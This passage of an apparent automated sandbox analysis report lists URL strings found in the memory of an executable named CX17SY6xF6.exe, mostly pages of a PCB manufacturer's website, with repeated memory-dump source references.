                  Source: CX17SY6xF6.exe, 00000000.00000002.861071046.0000000000E4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jacomfg.com/z
                  Source: CX17SY6xF6.exe, 00000000.00000003.684405138.0000000000E26000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.768564697.0000000000E3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jchysk.com/
                  Source: CX17SY6xF6.exe, 00000000.00000003.577604491.0000000000E54000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.576091404.0000000000E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jenco.co.uk/
                  Source: CX17SY6xF6.exe, 00000000.00000003.576091404.0000000000E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jenco.co.uk/_
                  Source: CX17SY6xF6.exe, 00000000.00000002.861071046.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.684405138.0000000000E26000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.768564697.0000000000E3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ka-mo-me.com/
                  Source: CX17SY6xF6.exe, 00000000.00000003.684405138.0000000000E26000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.649277876.0000000000E4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.kernsafe.com/
                  Source: CX17SY6xF6.exe, 00000000.00000003.699451551.00000000071CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.koz1.net/
                  Source: CX17SY6xF6.exe, 00000000.00000003.581132870.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.579192440.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.lagencefrancaise.com
                  Source: CX17SY6xF6.exe, 00000000.00000003.768564697.0000000000E3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.maktraxx.com/
                  Source: CX17SY6xF6.exe, 00000000.00000003.768564697.0000000000E3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.maktraxx.com/sb
                  Source: CX17SY6xF6.exe, 00000000.00000003.699451551.00000000071CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.medisa.info/
                  Source: CX17SY6xF6.exe, 00000000.00000003.699451551.00000000071CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.medius.si/
                  Source: CX17SY6xF6.exe, 00000000.00000003.699451551.00000000071CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.medius.si/Y
                  Source: CX17SY6xF6.exe, 00000000.00000003.768564697.0000000000E3C000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.649277876.0000000000E4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mqs.com.br/
                  Source: CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/blog/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/comments/feed/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/contact-us/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/contact-us/suggestion-box/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.681114888.00000000071FB000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.648512272.00000000071FB000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/download/DownloadApk.php
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/faq/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/feed/
                  Source: CX17SY6xF6.exe, 00000000.00000003.684405138.0000000000E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/j
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/my-cart/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/bom/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/fpc-quote/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/parts/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/online-quote/pcb-and-schematic-design/
